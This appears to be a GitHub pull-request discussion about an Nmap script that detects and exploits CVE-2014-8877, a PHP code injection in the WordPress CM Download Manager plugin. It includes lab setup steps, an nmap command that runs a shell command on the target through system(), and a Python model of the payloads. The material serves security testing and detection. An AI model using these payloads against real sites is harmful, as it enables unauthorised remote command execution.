Conversation

@mzet- mzet- commented Jan 2, 2015

Overview

The following script detects and exploits the CVE-2014-8877 vulnerability in the WordPress CM Download Manager plugin
(https://wordpress.org/plugins/cm-download-manager/). Versions <= 2.0.0 are affected.

The vulnerability allows injecting arbitrary PHP code via the CMDsearch param. The script simply injects a system() call with the OS shell command of choice (provided as a script parameter) as its argument.

Preparing testing environment

To prepare a local testing environment, perform the following steps:

  • Install the latest version of WordPress on a Linux machine
  • Get the vulnerable version of the WordPress CM Download Manager plugin: svn co -r 1007950 http://plugins.svn.wordpress.org/cm-download-manager/trunk/ cm-dw-manager
  • Prepare the plugin for installation: find cm-dw-manager/ -type d -name .svn -print0 | xargs -0 rm -rf; zip -r cm-download-manager.zip cm-dw-manager/
  • Upload it to the wp-content/plugins directory of your WordPress installation. Unzip. Activate it in the admin panel.

Running the script

nmap -P0 -p80 -n --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress"

where the 'cmd' parameter is the shell command to execute and 'uri' is the path to your WordPress installation.


You could pick a pseudo-random string, maybe with a hash of the command sent instead of ZZZ (just to avoid to miss part of the result if it includes ZZZ).

@dmiller-nmap

@mzet- Sorry for the delay in reviewing this. Unfortunately, it has false positive problems. If the page requested echoes the request URI at all, then the check will be true, since the check is a simple echo function. Here are the changes I would like to see before we could include this:

  1. Come up with a check that is not subject to this echo problem. This could be done by base64-encoding the string and having the server use base64_decode to echo it back.
  2. Use pure PHP calls for the check function, not system. This will help keep the script cross-platform and less likely to run afoul of a WAF or other server hardening.
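As an added example (not the PR's Lua script and not code from the Nmap project), here is the check and exploit logic from the first post and from the review comment above, modelled in Python: the naive "echo the marker" check that any page reflecting the request URI defeats, the base64_decode() variant that avoids that false positive, and random start/end markers around system() output in place of a fixed "ZZZ" delimiter. The CMDsearch parameter name and the base64_decode()/system() payload shapes come from the thread; the URL layout under the WordPress base URI, the two in-memory stand-ins for the target, and the canned "www-data" command output are constructed assumptions, so nothing here touches a network or runs a command.

```python
import base64
import html
import re
import secrets
import urllib.parse

# Parameter name comes from the PR text; placing it as a query parameter
# directly under the WordPress base URI is an assumption for this example.
PARAM = "CMDsearch"


def make_token(nbytes=8):
    """Random hex marker. Its base64 form travels in the request; the raw form
    can only appear in the response if the server really ran base64_decode()."""
    return secrets.token_hex(nbytes)


def naive_check_payload(token):
    """Old-style check: echo the marker as-is. Any page that reflects the
    request URI also contains the marker, hence the false positive."""
    return 'echo "%s";' % token


def b64_check_payload(token):
    """Reviewer-suggested check: the request only carries base64(token); the
    raw token shows up only if the injected PHP was executed."""
    b64 = base64.b64encode(token.encode()).decode()
    return 'echo base64_decode("%s");' % b64


def exploit_payload(cmd, start, end):
    """Exploit step: wrap system() output in two random markers instead of a
    fixed 'ZZZ' so output that happens to contain the delimiter is not cut."""
    return 'echo "%s"; system("%s"); echo "%s";' % (start, cmd, end)


def request_uri(base_uri, php):
    return "%s/?%s" % (base_uri.rstrip("/"), urllib.parse.urlencode({PARAM: php}))


def looks_vulnerable(body, token):
    return token in body


def extract_output(body, start, end):
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(end), body, re.S)
    return m.group(1) if m else None


# --- constructed stand-ins for the two kinds of target (no network) -------

def reflecting_page(uri):
    """Not vulnerable, but prints the request URI ('no results for ...')."""
    return "<p>No results for %s</p>" % html.escape(uri)


def vulnerable_page(uri):
    """Constructed model of the injection: evaluates only the three PHP
    statement shapes built above. system() yields canned output, never runs."""
    php = urllib.parse.parse_qs(urllib.parse.urlparse(uri).query)[PARAM][0]
    out = []
    for b64, lit, cmd in re.findall(
            r'echo base64_decode\("([^"]*)"\);|echo "([^"]*)";|system\("([^"]*)"\);', php):
        if b64:
            out.append(base64.b64decode(b64).decode())
        elif lit:
            out.append(lit)
        elif cmd:
            out.append("www-data\n" if cmd == "whoami" else "")  # canned, constructed
    return "<html>%s</html>" % "".join(out)


def demo(base_uri="/wordpress", cmd="whoami", target=vulnerable_page):
    """Check first with the base64 probe; only then inject system() and pull
    the command output from between the two random markers."""
    token = make_token()
    if not looks_vulnerable(target(request_uri(base_uri, b64_check_payload(token))), token):
        return None
    start, end = make_token(), make_token()
    body = target(request_uri(base_uri, exploit_payload(cmd, start, end)))
    return extract_output(body, start, end)
```

The reflecting page shows the failure mode the reviewer describes: with naive_check_payload() the raw marker is part of the URI, so a page that echoes the URI passes the check without executing anything, whereas with b64_check_payload() the URI carries only the base64 form and the raw marker can come back only from base64_decode() running server-side. Running demo() against reflecting_page returns None; against vulnerable_page it returns the canned "www-data" output.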

@mzet- mzet- (Author) commented Sep 22, 2015

Guys,

I've finally found some time to incorporate your feedback:

  • a base64-encoded string is used now,
  • PHP system() isn't used anymore for checking if the site is vulnerable (it is used only for invoking the payload),
  • I've also got rid of the 'ZZZ' strings and changed them to random strings.
